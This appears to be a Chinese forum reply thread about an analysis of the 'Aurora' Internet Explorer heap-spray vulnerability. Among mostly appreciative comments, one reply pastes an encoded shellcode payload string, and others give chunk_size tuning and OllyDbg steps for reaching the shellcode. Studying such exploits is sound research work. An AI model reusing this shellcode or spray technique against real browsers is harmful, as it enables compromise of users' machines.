膜拜，好久没通宵了！

成功运行 学习学习 ~

感谢分享，漏洞细节真复杂。

我是XP SP2 ，IE6.0
chunk_size 改大点是不是会好点，0X80000 没弹出计算器，chunk_size = 0x90000;  时弹出计算器。

官方现在已经给出相应的补丁了。

不错,学习一下

[QUOTE=轩辕小聪;751279]附件为PoC网页，如果进入shellcode成功会弹出个计算器，貌似这个网上已经有了。 aurora.rar[/QUOTE]

太深了, 我连什么地方是"计算器"的字符串也看不出.....
unescape 好像解密不了: http://blog.gxceo.com/gj/base64.html

请问在这里吗?

payload = unescape("%uc931%ue983%ud9dd%ud9ee%u2474%u5bf4%u7381%u6f13%ub102%u830e%ufceb%uf4e2%uea93%u0ef5%u026f%u4b3a%u8953%u0bcd%u0317%u855e%u1a20%u513a%u034f%u475a%u36e4%u0f3a%u3381%u9771%u86c3%u7a71%uc368%u037b%uc06e%ufa5a%u5654%u0a95%ue71a%u513a%u034b%u685a%u0ee4%u85fa%u1e30%ue5b0%u1ee4%u0f3a%u8b84%u2aed%uc16b%uce80%u890b%u3ef1%uc2ea%u02c9%u42e4%u85bd%u1e1f%u851c%u0a07%u075a%u82e4%u0e01%u026f%u663a%u5d53%uf880%u540f%uf638%uc2ec%u5eca%u7c07%uec69%u6a1c%uf029%u0ce5%uf1e6%u6188%u62d0%u2c0c%u76d4%u020a%u0eb1");

牛人！~我用ollydbg调了好几天，都搞不定ie7的shellcode跳转定位问题。看来还需要学习很多东西。windbg有什么学习资料?

payload 对应的16进制 就是

31 c9 83 e9 ............
每两个一组反序就是了

16进制对应的 汇编代码是 调用 cals.exe的 shellcode
其中cals.exe字符串在shellcode里是加密了的 执行shellcode 是有个解码的过程的 所以看不到字符串在什么地方

“我用ollydbg调了好几天，都搞不定ie7的shellcode跳转定位问题”...

od载入iexplorer.exe 运行 弹出ie后选择打开poc  然后od会在异常的地方停下来，
od里环境有所改变 这时ecx 的值 没有被0a0a0a0a覆盖，你可以手动给ecx赋值 0a0a0a0a
单步进入call里执行，经过漫长的指令0a0a 0a0a 后就到shellcode 了。

heap spray 似乎不需要精确的shellcode定位 只需要申足够大的内存地址空间 把需要覆盖掉的指针地址覆盖掉 就ok了，属于暴力型的。所以这个chunk_size  你也可以自己试着随意给。

想问楼主下:
mshtml!CEventObj::GenericGetElement+0x99
mshtml!CEventObj::get_srcElement+0x15
这里的函数名是如何显示出来的？
我加载了符号表，但是没有显示的和你大不一样

在ollydbg里面怎么找到这块有问题的代码？

拜膜小聪~拜膜漏洞~

牛B，学习了

多谢，仔细研究中

恩，实在是佩服的五体投地。。。发现这个漏洞的人是个天才

不懂，但要坚持学

在此向小聪学习了。

大虾的分析实在精辟，应该是安全公司的人

哇。。来学习一下。

纯支持了，看不懂的

好恐怖哦
一不小心 就中招了......

学习中 顶了  谢谢lz

“不是起来得太早，是通宵了”，难道这就是99%的汗水，呵……小聪手艺愈发精湛了。

楼主玩得也太晚了。上个月月中就玩过了，只花了半个小时

学习中,很强大

顶楼主，分析的太棒了~~~